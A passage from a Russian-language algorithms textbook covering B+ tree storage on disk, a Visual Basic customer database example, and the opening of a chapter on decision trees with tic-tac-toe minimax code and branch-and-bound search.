Теперь допустим, что те же миллион записей находятся в Б+дереве, узлы которого имеют примерно тот же размер в байтах. Поскольку в узлах Б+дерева содержатся только ключи, то в каждом узле дерева может храниться до 20 ключей к записям. В этом случае, каждый узел будет иметь от 11 до 21 дочерних узлов, поэтому высота дерева будет от log21(1.000.000) до log11(1.000.000), или между 5 и 6. Чтобы найти элемент, программе понадобится всего 6 обращений к диску для нахождения его ключа, и еще одно обращение к диску, чтобы считать сам элемент.
В Б+деревьях также просто связать с набором записей множество ключей. В системе, оперирующей записями о сотрудниках, одно Б+дерево может использовать в качестве ключей фамилии, а другое — идентификационные номера социального страхования. Оба дерева будут содержать указатели на записи данных, которые будут находиться за пределами деревьев.
Улучшение производительности Бдеревьев
В этом разделе описаны два метода улучшения производительности Б и Б+деревьев. Первый метод позволяет перераспределить элементы между узлами одного уровня, чтобы избежать разбиения блоков. Второй позволяет помещать пустые ячейки в дерево, чтобы уменьшить вероятность необходимости разбиения блоков в будущем.
=======177
Балансировка для устранения разбиения блоков
При добавлении элемента к блоку, который уже заполнен, блок разбивается на два. Этого можно избежать, если выполнить балансировку этого узла с одним из узлов на том же уровне. Например, вставка нового элемента Q в Бдерево, показанное слева на рис. 7.20 обычно вызывает разбиение блока. Этого можно избежать, выполнив балансировку узла, содержащего J, K, L и N и левого узла на том же уровне, содержащего B и E. При этом получается дерево, показанное на рис. 7.20 справа.
Такая балансировка имеет ряд преимуществ. Вопервых, при этом блоки используются более эффективно. В них находится меньше пустых ячеек, при этом уменьшится количество расходуемой понапрасну памяти.
Что более важно, если не нужно будет разбиение блоков, то не понадобится и перемещение элемента в родительский узел. Это предотвращает возникновение длительной последовательности разбиений блоков.
С другой стороны, уменьшение числа неиспользуемых элементов в дереве увеличивает вероятность необходимости разбиения блоков в будущем. Так как в дереве остается меньше свободных ячеек, то более вероятно, что узел окажется уже полон, когда понадобится вставить новый элемент.
Добавление свободного пространства
Предположим, что имеется небольшая база данных клиентов, содержащая 10 записей. Можно загружать записи в Бдерево так, чтобы они заполняли каждый блок целиком, как показано на рис. 7.21. При этом дерево содержит мало свободного пространства, и вставка нового элемента сразу же приводит к разбиению блоков. Фактически, так как все блоки заполнены, она вызовет последовательность разбиения блоков, которая дойдет до корневого узла.
Вместо плотного заполнения дерева, можно добавлять к каждому узлу некоторое количество пустых ячеек, как показано на рис. 7.22. Хотя при этом дерево будет несколько больше, в него можно будет добавлять элементы, не вызывая сразу же последовательность разбиений блоков. После работы с деревом в течение некоторого времени, количество свободного пространства может уменьшиться до такой степени, при которой разбиения блоков могут возникнуть. Тогда можно перестроить дерево, добавив больше свободного пространства.
В реальных приложениях Бдеревья обычно имеют намного больший порядок, чем деревья, приведенные здесь. Добавление свободного пространства в дерево значительно уменьшает необходимость балансировки и разбиения блоков. Например, можно добавить в Бдерево 10 порядка 10 процентов свободного пространства, чтобы в каждом узле было место еще для двух элементов. С таким деревом можно будет работать достаточно долго, прежде чем возникнут длинные цепочки разбиений блоков.
Это очередной пример пространственновременного компромисса. Добавка в узлы пустого пространства увеличивает размер дерева, но уменьшает вероятность разбиения блоков.
@Рис. 7.20. Балансировка для устранения разбиения блоков
=======178
@Рис. 7.21. Плотное заполнение Бдерева
Вопросы, связанные с обращением к диску
Б и Б+деревья хорошо подходят для создания больших приложений баз данных. Типичное Б+дерево может содержать сотни, тысячи и даже миллионы записей. В этом случае в любой момент времени в памяти будет находиться только небольшая часть дерева и при каждом обращении к узлу, программе понадобится загрузить его с диска. В этом разделе описаны три момента, учитывать которые особенно важно, если данные находятся на диске: применение псевдоуказателей, выбор размера блоков, и кэширование корневого узла.
Псевдоуказатели
Коллекции и ссылки на объекты удобны для построения деревьев в памяти, но они могут быть бесполезны при хранении дерева на диске. Нельзя создать ссылку на запись в файле.
Вместо этого можно использовать методы работы с псевдоуказателями, похожие на те, которые были описаны во 2 главе. Вместо использования в качестве указателей на узлы дерева ссылок на объекты при этом используется номер записи узла в файле. Предположим, что Б+дерево 12 порядка использует 80байтные ключи. Структуру данных узла можно определить в следующем коде:
Global Const ORDER = 12
Global Const KEYS_PER_NODE = 2 * ORDER
Type BtreeNode
Key (1 To KEYS_PER_NODE) As String * 80 ' Ключи.
Child (0 To KEYS_PER_NODE) As Integer ' Указатели потомков.
End Type
Значения элементов массива Child представляют собой номера записей из дочерних узлов в файле. Произвольный доступ к данным Б+дерева из файла осуществляется при помощи записей, которые соответствуют структуре BtreeNode.
@Рис. 7.22. Свободное заполнение Бдерева
======179
Dim node As BtreeNode
Open Filename For Random As #filenum Len = Len(node)
После открытия файла, при помощи оператора Get можно выбрать любую запись:
Dim node As BtreeNode
' Выбрать запись с номером recnum.
Get #filenum, recnum, node
Чтобы упростить работу с Б+деревьями, можно хранить узлы Б+дерева и записи данных в разных файлах и использовать для управления каждым из них псевдоуказатели.
Когда счетчик ссылок на объект становится равным нулю, то Visual Basic автоматически уничтожает его. Это облегчает работу со структурами данных в памяти. С другой стороны, если программе больше не нужна какаялибо запись в файле, то она не может просто очистить все ссылки на нее. Если сделать так, то программа больше не сможет использовать эту запись, но запись попрежнему будет занимать место в файле.
Программа должна следить за неиспользуемыми записями, чтобы позднее можно было использовать их. Один из простых способов сделать это — вести связный список неиспользуемых записей. Если запись больше не нужна, она добавляется в список. Если программе нужно место для новой записи, она удаляет одну запись из списка. Если программе нужно вставить еще один элемент, а список пуст, она увеличивает файл данных.
Выбор размера блока
Чтение данных с диска происходит блоками, которые называются кластерами. Размер кластера обычно составляет 512 или 1024 байта, или еще какоелибо число байтов, равное степени двойки. Чтение всего кластера занимает столько же времени, сколько и чтение одного байта.
Можно воспользоваться этим фактом и создавать блоки, размер которых составляет целое число кластеров, а затем уместить в этот размер максимальное число ключей или записей. Например, предположим, что мы решили создавать блоки размером 2048 байт. При создании Б+дерева с 80байтными ключами в каждый блок можно поместить 24 ключа и 25 указателей (если указатель представляет собой 4байтное число типа long). Затем можно создать Б+дерево 12 порядка с блоками, которые определяются в следующем коде:
Global Const ORDER = 12
Global Const KEYS_PER_NODE = 2 * ORDER
Type BtreeNode
Key(1 To KEYS_PER_NODE) As String * 80 ' Ключ данных.
Child(0 To KEYS_PER_NODE) As Integer ' Указатели потомков.
End Type
=======180
Для того, чтобы считывать данные максимально быстро, программа должна использовать оператор Visual Basic Get для чтения узла целиком. Если использовать цикл For для чтения ключей и данных для каждого элемента по очереди, то программе придется обращаться к диску при чтении каждого элемента. Это намного медленнее, чем считывание всего узла сразу. В одном из тестов, для массива из 1000 элементов определенного пользователем типа чтение элементов по одиночке заняло в 27 раз больше времени, чем чтение их всех сразу. Следующий код демонстрирует оба способа чтения данных из узла:
Dim i As Integer
Dim node As BtreeNode
' Медленный способ доступа к данным.
For i = 1 To KEYS_PER_NODE
Get #filenum, , node.Key(i)
Next i
' Быстрый способ доступа к данным.
Get #filenum, , node
Кэширование узлов
Каждый поиск в Бдереве начинается с корневого узла. Можно ускорить поиск, если корневой узел будет все время находиться в памяти. Тогда во время поиска придется на один раз меньше обращаться к диску. При этом все равно необходимо записывать корневой узел на диск при каждом его изменении, иначе при повторной загрузке после отказа программы изменения в Бдереве будут потеряны.
Можно также кэшировать в памяти и другие узлы Бдерева. Если хранить в памяти все дочерние узлы корня, то их также не потребуется считывать с диска. Для Бдерева порядка K, корневой узел будет иметь от 1 до 2 * K ключей и поэтому у него будет от 2 до 2 * K + 1 дочерних узлов. Это значит, что в этом случае придется кэшировать до 2 * K + 1 узлов.
Программа также может кэшировать узлы при обходе Бдерева. Например, при прямом обходе программа обращается к каждому узлу и затем рекурсивно обходит все его дочерние узлы. При этом она вначале спускается к первому дочернему узлу, а после возврата переходит к следующему. При каждом возврате, программа должна снова обратиться к родительскому узлу, чтобы определить, к какому из дочерних узлов обращаться в следующую очередь. Кэшируя родительский узел в памяти, программа избегает необходимости снова считывать его с диска.
Применение рекурсии позволяет программе автоматически сохранять узлы в памяти без использования сложной схемы кэширования. При каждом вызове рекурсивного алгоритма обхода, определяется локальная переменная, в которой находится узел до тех пор, пока он не понадобится. При возврате из рекурсивного вызова Visual Basic автоматически освобождает эту переменную. Следующий код демонстрирует, как можно реализовать этот алгоритм обхода на языке Visual Basic.
=======181
Private Sub PreorderPrint(node_index As Integer)
Dim i As Integer
Dim node As BtreeNode
Get #filenum, node_index, node ' Кэшировать узел.
Print node_index ' Обращение к узлу.
For i = 0 To KEYS_PER_NODE
If node.Child(i) < 0 Then Exit For ' Вызов потомков.
PreorderPrint node.Child(i) ' Вызов потомка.
Next i
End Sub
База данных на основе Б+дерева
Программа Bplus работает с базой данных на основе Б+дерева, используя два файла данных. Файл Custs.DAT содержит записи с данными о клиентах, а файл Custs.IDX — узлы Б+дерева.
Чтобы добавить новую запись в базу данных, введите данные в поле Customer Record (Запись о клиенте), и затем нажмите на кнопку Add. Для поиска записи заполните поля Last Name (Фамилия) и First Name (Имя) в верхней части формы и нажмите на кнопку Find (Найти).
На рис. 7.23 показано окно программы после выполнения поиска записи для Рода Стивенса. Статистика внизу показывает, что данные были найдены в записи номер 302 после всего лишь трех обращений к диску. Высота Б+дерева в программе равна 3, и оно содержит 1303 записей данных и 118 блоков.
Когда вы вводите запись или проводите поиск, программа Bplus выбирает эту запись из файла. После нажатия на кнопку Remove программа удаляет запись из базы данных.
@Рис. 7.23. Программа Bplus
========182
Если выбрать в меню Display (Показать) команду Internal Nodes (Внутренние узлы), то программа выведет список внутренних узлов дерева. Она также выводит рядом с каждым узлом ключи, чтобы показать внутреннюю структуру дерева.
При помощи команды Complete Tree (Все дерево) из меню Display можно вывести структуру дерева целиком. Данные о клиентах выводятся внутри пунктирных скобок.
Кроме обычных полей адреса и фамилии, программа Bplus также включает поле NextGarbage, которое программа использует для работы со связным списком неиспользуемых в файле записей.
Type CustRecord
LastName As String * 20
FirstName As String * 20
Address As String * 40
City As String * 20
State As String * 2
Zip As String * 10
Phone As String * 12
NextGarbage As Long
End Type
' Размер записи данных о клиенте.
Global Const CUST_SIZE = 20 + 20 + 40 + 20 + 2 + 10 + 12 + 4
Внутренние узлы Б+дерева содержат ключи, которые используются для поиска данных о клиенте. Ключом для записи является фамилия клиента, дополненная в конце пробелами до 20 символов и заканчивающаяся запятой, за которой следует имя клиента, дополненное пробелами до 20 символов. Например, "Washington..........,George..............". При этом полная длина ключа составляет 41 символ.
Каждый внутренний узел также содержит указатели на дочерние узлы. Эти указатели определяют положение записей с данными о клиенте в файле Custs.DAT. Узлы также включают переменную NumKeys, которая содержит число используемых ключей.
Программа читает и пишет данные блоками примерно по 1024 байта. Если предположить, что блок содержит K ключей, то в каждом блоке будет K ключей длиной 41 байт, K + 1 указателей на дочерние узлы длиной по 4 байта, и двухбайтное целое число NumKeys. При этом блоки должны иметь максимально возможный размер и быть не больше 1024 байт.
Решив уравнение 41 * K + 4 * (K + 1) + 2 <= 1.024, получим K <= 22,62, поэтому K должно быть равно 22. В этом случае Б+дерево должно иметь 11 порядок, поэтому оно содержит по 22 ключа в каждом блоке. Каждый блок занимает 41 * 22 + 4 * (22 + 1) + 2 = 996 байт. Следующий код демонстрирует определение блоков в программе Bplus.
=======183
Const KEY_SIZE = 41
Const ORDER = 11
Global Const KEYS_PER_NODE = 2 * ORDER
Type Bucket
NumKeys As Integer
Key(1 To KEYS_PER_NODE) As String * KEY_SIZE
Child(0 To KEYS_PER_NODE) As Long
End Type
Global Const BUCKET_SIZE = 2 + _
KEYS_PER_NODE * KEY_SIZE + _
(KEYS_PER_NODE + 1) * 4
Программа Bplus записывает блоки Б+дерева в файле Custs.IDX. Первая запись в этом файле содержит заголовок, который описывает текущее состояние Б+дерева. В заголовок входит указатель на корневой узел, текущая высота дерева, указатель на первый пустой блок в файле Custs.IDX, и указатель на первый пустой блок в файле Custs.DAT.
Чтобы упростить чтение и запись заголовка, можно определить еще одну структуру, которая имеет в точности такой же размер, что и блоки данных, но содержит поля заголовка. Последнее поле в определении — это строка, которая заполняет конец структуры, чтобы ее размер был точно равен размеру блока.
Global Const HEADER_PADDING = _
BUCKET_SIZE - (7 * 4 + 2)
Type HeaderRecord
NumBuckets As Long
NumRecords As Long
Root As Long
NextTreeRecord As Long
NextCustRecord As Long
FirstTreeGarbage As Long
FirstCustGarbage As Long
Height As Integer
Padding As String * HEADER_PADDING
End Type
При запуске программы она запрашивает директорию, в которой находятся данные, и затем открывает файлы Custs.DAT файлы Custs.IDX в этой директории. Если эти файлы не существуют, то программа их создает. В противном случае, она считывает заголовок с информацией о дереве из файла Custs.IDX. Затем она считывает корневой узел Б+дерева и кэширует его в памяти.
Спускаясь по дереву при вставке или удалении элемента, программа кэширует элементы, к которым она обращается. При рекурсивном возврате эти узлы могут понадобиться снова, если происходило разбиение, слияние или другое переупорядочение узлов. Так как программа кэширует узлы на пути сверху вниз, они будут доступны при возвращении обратно.
Увеличение размера блоков позволяет сделать Б+деревья более эффективными, но при этом тестировать их вручную будет сложнее. Чтобы высота Б+дерева 11 порядка стала равна 2, необходимо добавить к базе данных 23 элемента. Чтобы увеличить высоту дерева до 3 уровня, необходимо добавить более 250 дополнительных элементов.
=======184
Чтобы было проще тестировать программу Bplus, вы можете захотеть уменьшить порядок Б+дерева до 2. Для этого закомментируйте в файле Bplus.BAS строку, которая определяет 11 порядок, и уберите комментарий из строки, которая задает 2 порядок:
'Const ORDER = 11
Const ORDER = 2
Команда Create Data (Создать данные) в меню Data (Данные) позволяет быстро создать множество записей данных. Введите число записей, которые вы хотите создать, и число, которое программа должна использовать для создания первого элемента. Затем программа создаст записи и вставит их в Б+дерево. Например, если задать в программе создание 100 записей, начиная со значения 200, то программа создаст записи 200, 201, … 299, которые будут выглядеть так:
FirstName: First 0000200
LastName: Last 0000200
Address: Addr 0000200
Cuty: City 0000200
Резюме
Применение сбалансированных деревьев в программе позволяет эффективно работать с данными. Для записи больших баз данных на дисках или других относительно медленных запоминающих устройствах особенно удобны Б+деревья высокого порядка. Более того, можно использовать несколько Б+деревьев для создания нескольких индексов одного и того же большого набора данных.
В главе 11 описана альтернатива сбалансированным деревьям. Хеширование в некоторых случаях позволяет добиться еще более быстрого доступа к данным, хотя оно и не позволяет выполнять такие операции, как последовательный вывод записей.
========185
Глава 8. Деревья решений
Многие сложные реальные задачи можно смоделировать при помощи деревьев решений (decision trees). Каждый узел дерева представляет один шаг решения задачи. Каждая ветвь в дереве представляет решение, которое ведет к более полному решению. Листья представляют собой окончательное решение. Цель заключается в том, чтобы найти «наилучший» путь от корня к листу при выполнении определенных условий. Эти условия и значение понятия «наилучший» для пути зависит от задачи.
Деревья решений обычно имеют громадный размер. Дерево решений для игры в крестикинолики содержит более полумиллиона узлов. Эта игра довольно проста, и многие реальные задачи намного более сложны. Соответствующие им деревья решений могли бы содержать больше узлов, чем число атомов во вселенной.
В этой главе обсуждаются методы, которые можно использовать для поиска в таких огромных деревьях. Вопервых, в ней вначале рассматриваются деревья игры (game trees). На примере игры в крестикинолики обсуждаются способы поиска в деревьях игры для нахождения наилучшего возможного хода.
В следующих разделах описываются способы поиска в более общих деревьях решений. Для самых маленьких деревьев, можно использовать метод полного перебора (exhaustive searching) всех возможных решений. Для деревьев большего размера, можно использовать метод ветвей и границ (branchandbound technique) позволяет найти наилучшее решение без необходимости выполнять поиск по всему дереву.
Для очень больших деревьев нужно использовать эвристический метод или эвристику (heuristic). При этом полученное решение может быть не наилучшим из возможных решений, но оно, тем не менее, лежит достаточно близко к наилучшему, чтобы его можно было использовать. Используя эвристики, можно проводить поиск практически в любых деревьях решений.
В конце этой главы обсуждаются некоторые очень сложные задачи, которые вы можете попытаться решить при помощи метода ветвей и границ или эвристического метода. Многие из этих задач имеют важные применения, и нахождение хороших решений для них крайне необходимо.
Поиск в деревьях игры
Стратегию настольных игр, таких как шахматы, шашки, или крестикинолики можно смоделировать при помощи деревьев игры. Если в какой то момент игры существует 30 возможных ходов, то соответствующий узел в дереве игры будет иметь 30 ветвей.
========187
Например, для игры в крестикинолики корневой узел соответствует начальной позиции, при которой доска пуста. Первый игрок может поместить крестик в любую из девяти клеток доски. Каждому из этих девяти возможных ходов соответствует выходящая из корня ветвь. Девять узлов на конце эти ветвей соответствуют девяти различным позициям после первого хода игрока.
После того, как первый игрок сделал ход, второй может поставить нолик в любую из оставшихся восьми клеток. Каждому из этих ходов соответствует ветвь, выходящая из узла, соответствующего текущей позиции игры. На рис. 8.1 показан небольшой фрагмент дерева игры в крестикинолики.
Как можно увидеть на рис. 8.1, дерево игры в крестикинолики растет очень быстро. Если оно продолжит расти таким образом, так что каждый следующий узел в дереве будет иметь на одну ветвь меньше, чем его родитель, то дерево целиком будет иметь 9 * 8 * 7 … * 1 = 362.880 листьев. В дереве будет 362.880 возможных путей, соответствующих 362.800 возможным играм.
В действительности многие из узлов дерева будут отсутствовать, так как соответствующие им ходы запрещены правилами игры. Если игрок, ходивший первым, за три своих хода поставит крестики в верхней левой, верхней средней и верхней правой клетках, то он выиграет и игра закончится. Узел, соответствующий этой позиции, не будет иметь потомков, так как игра завершается на этом шаге. Эта игра показана на рис. 8.2.
После удаления всех невозможных узлов в дереве остается около четверти миллиона листьев. Это все еще очень большое дерево, и поиск его методом полного перебора занимает достаточно много времени. Для более сложных игр, таких как шашки, шахматы или го, деревья игры имеют огромный размер. Если бы во время каждого хода в шахматах игрок имел 16 возможных вариантов, то дерево игры имело бы более триллиона узлов после пяти ходов каждого из игроков. В конце этой главы обсуждается поиск в таких огромных деревьях игры, а следующий раздел посвящен более простому примеру игры в крестикинолики.
@Рис. 8.1. Фрагмент дерева игры в крестикинолики
========188
@Рис. 8.2. Быстрое окончание игры
Минимаксный поиск
Для выполнения поиска в дереве игры, нужно иметь возможность определить вес позиции на доске. Для игры в крестикинолики, для первого игрока больший вес имеют позиции, в которых три крестика расположены в ряд, так как при этом первый игрок выигрывает. Вес тех же позиций для второго игрока мал, потому, что в этом случае он проигрывает.
Для каждого игрока, можно присвоить позиции один из четырех весов. Если вес равен 4, то это значит, что игрок в этой позиции выигрывает. Если вес равен 3, то из текущего положения на доске неясно, кто из игроков выиграет в конце концов. Вес, равный 2, означает, что позиция приводит к ничьей. И, наконец, вес, равный 1, означает, что выигрывает противник.
Для поиска дерева методом полного перебора можно использовать минимаксную (minimax) стратегию, при которой делается попытка минимизировать максимальный вес, который может иметь позиция для противника после следующего хода. Это можно сделать, определив максимально возможный вес позиции для противника после каждого из своих возможных ходов, и затем выбрав ход, который дает позицию с минимальным весом для противника.
Подпрограмма BoardValue, приведенная ниже, вычисляет вес позиции на доске, проверяя все возможные ходы. Для каждого хода она рекурсивно вызывает себя, чтобы найти вес, который будет иметь новая позиция для противника. Затем она выбирает ход, при котором вес полученной позиции для противника будет наименьшим.
Для определения веса позиции на доске процедура BoardValue рекурсивно вызывает себя до тех пор, пока не произойдет одно из трех событий. Вопервых, она может дойти до позиции, в которой игрок выигрывает. В этом случае, она присваивает позиции вес 4, что указывает на выигрыш игрока, совершившего последний ход.
======189
Вовторых, процедура BoardValue может найти позицию, в которой ни один из игроков не может совершить следующий ход. Игра при этом заканчивается ничьей, поэтому процедура присваивает этой позиции вес 2.
И наконец, процедура может достигнуть заданной максимальной глубины рекурсии. В этом случае, процедура BoardValue присваивает позиции вес 3, что указывает, что она не может определить победителя. Задание максимальной глубины рекурсии ограничивает время поиска в дереве игры. Это особенно важно для более сложных игр, таких как шахматы, в которых поиск в дереве игры может продолжаться практически вечно. Максимальная глубина поиска также может задавать уровень мастерства программы. Чем дальше вперед программа сможет анализировать ходы, тем лучше она будет играть.
На рис. 8.3 показано дерево игры в крестикинолики в конце партии. Ходит игрок, играющий крестиками, и у него есть три возможных хода. Чтобы выбрать наилучший ход, процедура BoardValue рекурсивно проверяет каждый из трех возможных ходов. Первый и третий возможные ходы (левая и правая ветви дерева) приводят к выигрышу противника, поэтому их вес для противника равен 4. Второй возможный ход приводит к ничьей, и его вес для противника равен 2. Процедура BoardValue выбирает этот ход, так как он имеет наименьший вес для противника.
@Рис. 8.3. Нижняя часть дерева игры
Private Sub BoardValue(best_move As Integer, best_value As Integer, pl1 As Integer, pl2 As Integer, Depth As Integer)
Dim pl As Integer
Dim i As Integer
Dim good_i As Integer
Dim good_value As Integer
Dim enemy_i As Integer
Dim enemy_value As Integer
DoEvents ' Не занимать 100% процессорного времени.
' Если глубина рекурсии слишком велика, результат неизвестен.
If Depth >= SkillLevel Then
best_value = VALUE_UNKNOWN
Exit Sub
End If
' Если игра завершается, то результат известен.
pl = Winner()
If pl <> PLAYER_NONE Then
' Преобразовать вес для победителя pl в вес для игрока pl1.
If pl = pl1 Then
best_value = VALUE_WIN
ElseIf pl = pl2 Then
best_value = VALUE_LOSE
Else
best_value = VALUE_DRAW
End If
Exit Sub
End If
' Проверить все допустимые ходы.
good_i = -1
good_value = VALUE_HIGH
For i = 1 To NUM_SQUARES
' Проверить ход, если он разрешен правилами.
If Board(i) = PLAYER_NONE Then
' Найти вес полученного положения для противника.
If ShowTrials Then _
MoveLabel.Caption = _
MoveLabel.Caption & Format$(i)
' Сделать ход.
Board(i) = pl1
BoardValue enemy_i, enemy_value, pl2, pl1, Depth + 1
' Отменить ход.
Board(i) = PLAYER_NONE
If ShowTrials Then _
MoveLabel.Caption = _
Left$(MoveLabel.Caption, Depth)
' Меньше ли этот вес, чем предыдущий.
If enemy_value < good_value Then
good_i = i
good_value = enemy_value
' Если мы выигрываем, то лучшего решения нет,
' поэтому выбирается этот ход.
If good_value <= VALUE_LOSE Then Exit For
End If
End If ' End if Board(i) = PLAYER_NONE ...
Next i
' Преобразовать вес позиции для противника в вес для игрока.
If good_value = VALUE_WIN Then
' Противник выигрывает, мы проиграли.
best_value = VALUE_LOSE
ElseIf enemy_value = VALUE_LOSE Then
' Противник проиграл, мы выиграли.
best_value = VALUE_WIN
Else
' Вес ничьей или неопределенной позиции
' одинаков для обоих игроков.
best_value = good_value
End If
best_move = good_i
End Sub
Программа TicTac использует процедуру BoardValue. Основная часть кода программы обеспечивает взаимодействие с пользователем, рисует доску, позволяет пользователю выбрать ход, задавать опции и так далее.
Если не выбрана команда Show Test Moves (Показывать проверяемые ходы) из меню Options (Опции), то производительность программы будет намного выше. Если выбрана эта опция, то программа выводит каждый анализируемый ход. Постоянное обновление экрана занимает намного больше времени, чем действительный поиск в дереве.
Другие команды в меню Options позволяют вам, выбрать уровень мастерства программы (максимальную глубину рекурсии) и выбрать игру крестиками или ноликами. При высоком уровне мастерства первый ход занимает намного больше времени.
=====192
Сдача
Подпрограмма BoardValue имеет интересный побочный эффект. Если она находит два одинаково хороших хода, то она выбирает из них первый попавшийся. Иногда это приводит к странному поведению программы. Например, если программа определяет, что при любом своем ходе она проигрывает, то она выбирает первый из них. Иногда этот ход может показаться человеку глупым. Может создаться впечатление, что компьютер выбрал случайный ход и сдается. В какой то степени это действительно так.
Например, запустим программу TicTac с третьим уровнем мастерства. Перенумеруем клетки так, как показано на рис. 8.4. Сделаем первых ход в клетку 6. Программа выберет клетку 1. Выберем клетку 3, программа ответит ходом на клетку 9. Теперь, если занять клетку 5, то наступает выигрыш, если следующим ходом пойти на клетку 4 или 7.
Компьютер теперь может просмотреть дерево игры до конца и убедиться в своем проигрыше. В такой ситуации человек попытался бы заблокировать один из выигрышных ходов, либо поместить два нолика в ряд, чтобы попытаться выиграть на следующем ходу. В более сложной игре, такой как шахматы, человек также может выбрать одну из этих стратегий, в надежде на то, что соперник не увидит пути к победе. Соперник может ошибиться, давая игроку тем самым шанс на победу.
Программа же считает, что противник играет безошибочно и также знает о своем выигрыше. Так как ни один ход не приводит к победе, то программа выбирает первый попавшийся ход, в данном случае занимает клетку 2. Этот ход кажется глупым, так как он не блокирует ни одного из возможных выигрышных ходов, и не делает попытку выиграть на следующем ходу. При этом кажется, что компьютер сдается. Эта игра показана на рис. 8.5.
Один из способов предотвращения такого поведения состоит в том, чтобы задать больше различных весов позиций. В программе TicTac все проигрышные позиции имеют одинаковый вес. Можно присвоить позиции, в которой проигрыш происходит за два хода, больший вес, чем позиции, в которой проигрыш наступает на следующем ходу. Тогда программа сможет выбирать ходы, которые приведут к затягиванию игры. Также можно присваивать больший вес позиции, в которой имеются два возможных выигрышных хода, чем позиции, в которой есть только один выигрышный ход. В таком случае компьютер попытался бы заблокировать один из возможных выигрышных ходов.
Улучшение поиска в дереве игры
Если бы для поиска в дереве игры мы располагали только минимаксной стратегией, то выполнить поиск в больших деревьях было бы очень сложно. Такие игры, как шахматы, настолько сложны, что программа может провести поиск всего лишь на нескольких уровнях дерева. К счастью, существуют несколько приемов, которые можно использовать для поиска в больших деревьях игры.
@Рис. 8.4. Нумерация клеток доски игры в крестикинолики
======193
@Рис. 8.5. Программа игры в крестикинолики сдается
Предварительное вычисление начальных ходов
Вопервых, в программе могут быть записаны начальные ходы, выбранные экспертами. Можно решить, что программа игры в крестикинолики должна делать первый ход в центральную клетку. Это определяет первую ветвь дерева игры, поэтому программа может игнорировать все пути, не проходящие через первую ветвь. Это уменьшает дерево игры в крестикинолики в 9 раз.
Фактически, программе не нужно выполнять поиск в дереве до того, пока противник не сделает свой ход. В этот момент и компьютер и противник выбрали каждый свою ветвь, поэтому оставшееся дерево станет намного меньше, и будет содержать менее чем 7! = 5040 путей. Просчитав заранее всего один ход, можно уменьшить размер дерева игры от четверти миллиона до менее чем 5040 путей.
Аналогично, можно записать ответы на первые ходы, если противник ходит первым. Есть девять вариантов первого хода, следовательно, нужно записать девять ответных ходов. При этом программе не нужно поводить поиск по дереву, пока противник не сделает два хода, а компьютер — один. Тогда дерево игры будет содержать менее чем 6! = 720 путей. Записано всего девять ходов, а размер дерева при этом уменьшается очень сильно. Это еще один пример пространственновременного компромисса. Использование большего количества памяти уменьшает время, необходимое для поиска в дереве игры.
Программа TicTac2 использует 10 записанных ходов. Задайте 9 уровень мастерства, и пусть программа делает первый ход. Затем задайте те же опции в программе TicTac. Вы увидите громадную разницу в скорости работы этих двух программ.
Коммерческие программы игры в шахматы также начинают с записанных ходов и ответов, рекомендованных гроссмейстерами. Такие программы могут делать первые ходы очень быстро. После того, как программа исчерпает все записанные заранее ходы, она начнет делать ходы намного медленнее.
Определение важных позиций
Другой способ улучшения поиска в дереве игры состоит в том, чтобы определять важные позиции. Если программа распознает одну из этих позиций, она может выполнить определенные действия или изменить способ поиска в дереве игры.
========194
Во время игры в шахматы игроки часто располагают фигура так, чтобы они защищали другие фигуры. Если противник берет фигуру, то игрок берет фигуру противника взамен. Часто такое взятие позволяет противнику в свою очередь взять другую фигуру, что приводит к серии обменов.
Некоторые программы находят возможные последовательностей обменов. Если программа распознает возможность обмена, она на время изменяет максимальную глубину, на которую она просматривает дерево, чтобы проследить до конца цепочку обменов. Это позволяет программе решить, стоит ли идти на обмен. После обмена фигур их количество также уменьшается, поэтому поиск в дереве игры становится в будущем более простым.
Некоторые шахматные программы также отслеживают рокировки, ходы, при которых под боем оказывается сразу несколько фигур, шах или нападение на ферзя и так далее.
Эвристики
В играх, более сложных, чем крестикинолики, практически невозможно провести поиск даже в небольшом фрагменте дерева игры. В этих случаях, можно использовать различные эвристики. Эвристикой называет алгоритм или эмпирическое правило, которое вероятно, но не обязательно даст хороший результат.
Например, в шахматах обычной эвристикой является «усиление преимущества». Если у противника меньше сильных фигур и одинаковое число остальных, то следует идти на размен при каждой возможности. Например, если вы берете коня противника, теряя при этом своего, то такой обмен следует выполнить. Уменьшение числа оставшихся фигур делает дерево решений короче и может увеличить относительное преимущество. Эта стратегия не гарантирует выигрыша, но повышает его вероятность.
Другая часто используемая эвристика заключается в присвоении разных весов различным частям доски. В шахматах вес клеток в центре доски выше, так как фигуры, находящиеся на этих позициях, могут атаковать большую часть доски. Когда процедура BoardValue вычисляет вес текущей позиции на доске, она может присваивать больший вес фигурам, которые занимают клетки в центре доски.
Поиск в других деревьях решений
Некоторые методы поиска в деревьях игры неприменимы к обобщенным деревьям решений. Многие их этих деревьев не включают поочередных ходов игроков, поэтому минимаксный метод и вычисленные заранее ходы в данном случае бессмысленны. В следующих разделах описаны методы, которые можно использовать для поиска в этих типах деревьев решений.
=======195
Метод ветвей и границ
Метод ветвей и границ (branch and bound) является одним из методов отсечения (pruning) ветвей в дереве решений, чтобы не было необходимо рассматривать все ветви дерева. Общий подход при этом состоит в том, чтобы отслеживать границы уже обнаруженных и возможных решений. Если в какойто точке наилучшее из уже найденных решений лучше, чем наилучшее возможное решение в нижних ветвях, то можно игнорировать все пути вниз от узла.
Например, допустим, что имеет 100 миллионов долларов, которые нужно вложить в несколько возможных инвестиций. Каждое из вложений имеет разную стоимость и дает разную прибыль. Необходимо решить, как вложить деньги наилучшим образом, чтобы суммарная прибыль была максимальной.
Задачи такого типа называются задачей формирования портфеля (knapsack problem). Имеется несколько позиций (инвестиций), которые должны поместиться в портфель фиксированного размера (100 миллионов долларов). Каждая из позиций имеет стоимость (деньги) и цену (тоже деньги). Необходимо найти набор позиций, который помещается в портфель и имеет максимально возможную цену.
Эту задачу можно смоделировать при помощи дерева решений. Каждый узел дерева соответствует определенной комбинации позиций в портфеле. Каждая ветвь соответствует принятию решения о том, чтобы удалить позицию из портфеля или добавить ее в него. Левая ветвь первого узла соответствует первому вложению. На рис. 8.6 показано дерево решений для четырех возможных инвестиций.
Дерево решений для этой задачи представляет собой полное двоичное дерево, глубина которого равна числу инвестиций. Каждый лист соответствует полному набору инвестиций.
Размер этого дерева очень быстро растет с увеличением числа инвестиций. Для 10 возможных инвестиций, в дереве будет находиться 210 = 1024 листа. Для 20 инвестиций, в дереве будет уже более миллиона листьев. Можно провести полный поиск по такому дереву, но при дальнейшем увеличении числа возможных инвестиций размер дерева станет очень большим.
@Рис. 8.6. Дерево решений для инвестиций
=======196
